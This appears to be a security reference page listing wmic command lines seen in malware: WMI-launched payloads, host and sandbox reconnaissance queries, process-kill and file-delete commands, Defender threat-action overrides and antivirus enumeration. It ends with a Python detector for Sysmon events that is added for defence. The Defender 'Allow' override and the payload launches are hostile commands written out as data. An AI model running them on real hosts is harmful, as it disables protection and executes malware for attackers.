Examples of fileless attacks via wmic
wmic process call create invokes the WMI method Win32_Process.Create. The new process is started by the WMI provider host (WmiPrvSE.exe), not by the shell that ran wmic, so the parent/child chain back to the attacker's console is broken; that launch path is what "fileless" refers to here. Several of the payloads below still run a dropped executable or a LOLBin (regsvr32, wscript), and the last one runs an alternate data stream attached to a directory (AppData\Roaming:ApplicationData).
Case:
Payload:
wmic process call create "C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"
C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
wmic.exe process call create 'regsvr32 -s C:\Users\Public\connectfront.xref'
WMIC Process Call Create "C:\Windows\System32\Wscript.exe //NOLOGO C:\Users\admin\AppData\Local\Temp\C-PDI-C-Cpy-T.vbs"
wmic process call create "C:\ProgramData\Chrome\PacketVMArranger.exe"
wmic process call create '"C:\Users\admin\AppData\Roaming:ApplicationData"'
Reading system information via wmic
These are the queries malware typically runs for host reconnaissance and sandbox/VM detection: hypervisor presence, video adapter name, system vendor and model, DEP settings, domain membership, OS language and build. The annotations after a command are values returned on the author's own host.
Case:
payload:
"wmic" os get Caption /format:list   my host returns: Caption=Microsoft Windows 10 专业版 (the Chinese-locale string for "Pro")
"wmic" path win32_VideoController get name /format:list
WMIC OS GET LocalDateTime /value   get the current time
WMIC OS GET LastBootUpTime /value
wmic os get osarchitecture /value
wmic ComputerSystem get HypervisorPresent /format:list   check whether a hypervisor is present (TRUE in any guest, but also on a Hyper-V host)
wmic ComputerSystem get PartOfDomain /format:list
wmic ComputerSystem get PCSystemType /format:list
wmic logicaldisk where (caption="C:") get filesystem /value   my host returns NTFS
WMIC PATH WIN32_OperatingSystem get OSLanguage /format:list
WMIC OS GET NumberOfLicensedUsers /value
WMIC OS GET PortableOperatingSystem /value
WMIC PATH WIN32_OperatingSystem get DataExecutionPrevention_32BitApplications /format:list   my machine returns: DataExecutionPrevention_32BitApplications=TRUE
WMIC PATH WIN32_OperatingSystem get DataExecutionPrevention_Available /format:list
WMIC PATH WIN32_OperatingSystem get DataExecutionPrevention_Drivers /format:list
WMIC CSPRODUCT GET NAME /format:list
wmic csproduct get vendor,name,identifyingnumber   shows the host vendor, model and serial number
Terminating processes via wmic
The WQL filter matches on both the image name and ExecutablePath, so it only kills the copy at that exact location; backslashes are doubled because WQL treats a backslash as an escape character. Most of the targets below are binaries masquerading as system processes from non-standard paths (svchost.exe under SysWOW64\inetsrv\102 or SysWOW64\drivers, taskmgr.exe under Windows\Temp\locales). The two datafile commands use the CIM_DataFile class, whose Drive, Path, FileName and Extension properties together identify the file to delete.
Case:
payload:
wmic process where "name='systems.exe' and ExecutablePath='C:\\Windows\\debug\\NAT\\systems.exe'" call Terminate
wmic process where "name='TrustedInsteller.exe' and ExecutablePath='C:\\Program Files\\Common Files\\Services\\TrustedInsteller.exe'" call Terminate
wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\inetsrv\\102\\svchost.exe'" call Terminate
wmic process where "name='LDE.exe' and ExecutablePath='C:\\ProgramData\\WinTcpAutoProxySvc\\LDE.exe'" call Terminate
wmic process where "name='taskmgr.exe' and ExecutablePath='C:\\Windows\\Temp\\locales\\taskmgr.exe'" call Terminate
wmic process where "name='service.exe' and ExecutablePath='C:\\Windows\\data\\service.exe'" call Terminate
wmic process where "name='myminer.exe' and ExecutablePath='C:\\Windows\\temp\\winstart\\myminer.exe'" call Terminate
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\SysWOW64\\drivers\\svchost.exe'" call Terminate
wmic datafile where "drive='c:' and Path = '\\windows\\temp\\' and FileName = 'm' and Extension = 'ps1'" call delete
wmic datafile where "drive = 'c:' and Path = '\\windows\\temp\\' and FileName = 'mkatz' and Extension = 'ini'" call delete
wmic process where name="system" call terminate
wmic process where name="unitezip.exe" call terminate
Changing the default action for a specific threat via wmic
Payload:
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
This changes Defender's default action for one threat ID: action 6 (Allow) is bound to ThreatID=2147737007 (Name=Behavior:Win32/Execution.LR!ml), so detections of that signature are no longer acted on. The override is stored in the ThreatIDDefaultAction_Ids / ThreatIDDefaultAction_Actions properties of MSFT_MpPreference (the same values Get-MpPreference reports in PowerShell), which is where to look for this kind of tampering when auditing a host.
Supplement:
Windows Defender
Windows Defender (after update 1.293.1336.0) blocks StaffCop module for file monitoring. To check if it was blocked or not, we should check the availability of the file:
C:\Windows\System32\drivers\CaptureFileMonitor64.sys
If this file can't be found - you should perform the following actions.
Add exclusions
In cmd:
WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=252013 ThreatIDDefaultAction_Actions=6
Reading the list of antivirus products via wmic
The root\SecurityCenter2 namespace holds the products registered with Windows Security Center, so it exists on client editions of Windows only (Windows Server has no Security Center). Besides displayName, productState is the field usually queried, since it encodes whether the product is enabled and up to date.
Case:
Uses WMIC.EXE to obtain a list of AntiViruses
- cmd.exe (PID: 3392)
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
my host returns:
displayName
QiAnXin Skylar
Windows Defender
火绒安全软件
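As an added example covering all five sections above (detection logic written for these notes, not code from the original page), a Python classifier over process-creation events in Sysmon Event ID 1 style (ParentImage, Image, CommandLine). It flags children of WmiPrvSE.exe, wmic process call create, process termination and datafile deletion, MSFT_MpPreference changes, SecurityCenter2 AV enumeration, and the recon queries. The events are constructed from the command lines on the page; the /node: rule and the remote host 10.0.0.7 go beyond the page, which only shows /Node:localhost, and are an assumption about how the same calls look when aimed at another machine.

```python
"""Flag the WMIC activity shown in these notes in process-creation events.
Added example; the events are constructed in Sysmon Event ID 1 style."""
import ntpath
import re
from typing import Dict, List, Tuple

# wmic itself, whether bare, quoted, with .exe, or given by full path
WMIC_RE = re.compile(r'(^|[\\/\s"])wmic(\.exe)?(?=[\s"]|$)')

# (rule name, severity, pattern over the lower-cased, whitespace-collapsed command line)
RULES = [
    ("wmic_process_create", "high",
     re.compile(r"\bprocess\s+call\s+create\b")),                       # section 1
    ("wmic_process_terminate", "medium",
     re.compile(r"\bprocess\s+where\b.*\bcall\s+terminate\b")),         # section 3
    ("wmic_datafile_delete", "medium",
     re.compile(r"\bdatafile\s+where\b.*\bcall\s+delete\b")),           # section 3
    ("wmic_defender_preference_change", "high",
     re.compile(r"msft_mppreference\b.*\bcall\s+(add|set|remove)\b")),  # section 4
    ("wmic_av_discovery", "low",
     re.compile(r"securitycenter2\b.*\bantivirusproduct\b")),           # section 5
    ("wmic_host_recon", "low",
     re.compile(r"\b(os\s+get|csproduct|computersystem\s+get|"
                r"win32_operatingsystem|win32_videocontroller)\b")),    # section 2
]
NODE_RE = re.compile(r'/node:\s*"?([^\s"]+)')
LOCAL_NODES = {"localhost", "127.0.0.1", "."}


def analyze(event: Dict[str, str]) -> List[str]:
    """Return the rule names one event triggers (empty list = nothing of note)."""
    hits: List[str] = []
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    cmdline = " ".join(event.get("CommandLine", "").split()).lower()

    # A child of the WMI provider host was started through Win32_Process.Create;
    # the real caller (wmic, PowerShell, or a remote host) is not its parent.
    if parent == "wmiprvse.exe":
        hits.append("wmiprvse_child")

    if image == "wmic.exe" or WMIC_RE.search(cmdline):
        for name, _severity, pattern in RULES:
            if pattern.search(cmdline):
                hits.append(name)
        node = NODE_RE.search(cmdline)
        if node and node.group(1) not in LOCAL_NODES:
            hits.append("wmic_remote_node")  # /node:<host>: same action on another machine
    return hits


def detect(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run every event through analyze() and keep those with at least one hit."""
    findings: List[Tuple[int, List[str]]] = []
    for index, event in enumerate(events):
        hits = analyze(event)
        if hits:
            findings.append((index, hits))
    return findings


def _wmic_event(command_line: str) -> Dict[str, str]:
    """Constructed event: wmic launched from cmd.exe with the given command line."""
    return {"ParentImage": r"C:\Windows\System32\cmd.exe",
            "Image": r"C:\Windows\System32\wbem\WMIC.exe",
            "CommandLine": command_line}


SAMPLE_EVENTS = [
    _wmic_event(r'wmic process call create "C:\ProgramData\Chrome\PacketVMArranger.exe"'),
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",   # the resulting child
     "Image": r"C:\ProgramData\Chrome\PacketVMArranger.exe",
     "CommandLine": r"C:\ProgramData\Chrome\PacketVMArranger.exe"},
    _wmic_event('"wmic" os get Caption /format:list'),
    _wmic_event(r'''wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\drivers\\svchost.exe'" call Terminate'''),
    _wmic_event(r'''wmic datafile where "drive = 'c:' and Path = '\\windows\\temp\\' and FileName = 'mkatz' and Extension = 'ini'" call delete'''),
    _wmic_event(r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True'),
    _wmic_event(r'wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName'),
    # Not on the page: the same create call aimed at another host (10.0.0.7 is made up).
    _wmic_event(r'wmic /node:10.0.0.7 process call create "cmd /c whoami > C:\Windows\Temp\o.txt"'),
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},                               # benign control
]

if __name__ == "__main__":
    for index, hits in detect(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"][:60], "->", hits)
```

The WmiPrvSE.exe parent rule is the one that survives renaming or proxying of wmic: PowerShell Invoke-CimMethod and a remote caller produce the same child, so it should be triaged by the child's image path rather than suppressed; the wmic-specific rules are there to attribute the action and to separate the high-severity cases (creation, Defender tampering) from routine recon.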